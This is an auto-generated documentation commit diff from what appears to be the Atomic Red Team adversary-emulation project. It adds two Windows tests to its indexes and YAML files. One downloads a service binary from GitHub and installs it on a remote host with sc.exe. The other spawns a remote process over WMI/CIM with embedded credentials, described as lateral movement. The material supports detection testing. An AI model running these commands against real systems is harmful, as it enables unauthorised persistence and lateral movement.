Generated docs from job=generate-docs branch=master [ci skip]

2023-03-23 14:47:57 +00:00
parent 869420c151
commit 004e042089
10 changed files with 504 additions and 2 deletions
@@ -527,6 +527,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
@@ -623,6 +624,7 @@ privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
@@ -805,6 +807,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
@@ -912,6 +915,7 @@ persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdle
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
@@ -380,6 +380,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
@@ -448,6 +449,7 @@ privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -573,6 +575,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
@@ -645,6 +648,7 @@ persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdle
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -767,6 +767,7 @@
  - Atomic Test #2: Service Installation CMD [windows]
  - Atomic Test #3: Service Installation PowerShell [windows]
  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -929,6 +930,7 @@
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1236,6 +1238,7 @@
  - Atomic Test #2: Service Installation CMD [windows]
  - Atomic Test #3: Service Installation PowerShell [windows]
  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -1434,6 +1437,7 @@
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -564,6 +564,7 @@
  - Atomic Test #2: Service Installation CMD [windows]
  - Atomic Test #3: Service Installation PowerShell [windows]
  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
@@ -681,6 +682,7 @@
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -888,6 +890,7 @@
  - Atomic Test #2: Service Installation CMD [windows]
  - Atomic Test #3: Service Installation PowerShell [windows]
  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
+  - Atomic Test #5: Remote Service Installation CMD [windows]
 - [T1137 Office Application Startup](../../T1137/T1137.md)
  - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1026,6 +1029,7 @@
  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
+  - Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
 - T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -31064,6 +31064,54 @@ privilege-escalation:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
        name: command_prompt
        elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
  T1053.003:
    technique:
      x_mitre_platforms:
@@ -38917,6 +38965,49 @@ privilege-escalation:
        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
          Processor" -Name "AutoRun" -ErrorAction Ignore
        name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -52853,6 +52944,54 @@ persistence:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
        name: command_prompt
        elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
  T1053.003:
    technique:
      x_mitre_platforms:
@@ -63047,6 +63186,49 @@ persistence:
        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
          Processor" -Name "AutoRun" -ErrorAction Ignore
        name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -27210,6 +27210,54 @@ privilege-escalation:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
        name: command_prompt
        elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
  T1053.003:
    technique:
      x_mitre_platforms:
@@ -34181,6 +34229,49 @@ privilege-escalation:
        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
          Processor" -Name "AutoRun" -ErrorAction Ignore
        name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -46372,6 +46463,54 @@ persistence:
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
        name: command_prompt
        elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
  T1053.003:
    technique:
      x_mitre_platforms:
@@ -55150,6 +55289,49 @@ persistence:
        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
          Processor" -Name "AutoRun" -ErrorAction Ignore
        name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -18,6 +18,8 @@ Services may be created with administrator privileges but are executed under SYS

 - [Atomic Test #4 - TinyTurla backdoor service w64time](#atomic-test-4---tinyturla-backdoor-service-w64time)

+- [Atomic Test #5 - Remote Service Installation CMD](#atomic-test-5---remote-service-installation-cmd)
+

 <br/>

@@ -213,4 +215,61 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v Servic



+<br/>
+<br/>
+
+## Atomic Test #5 - Remote Service Installation CMD
+Download an executable from github and start it as a service on a remote endpoint
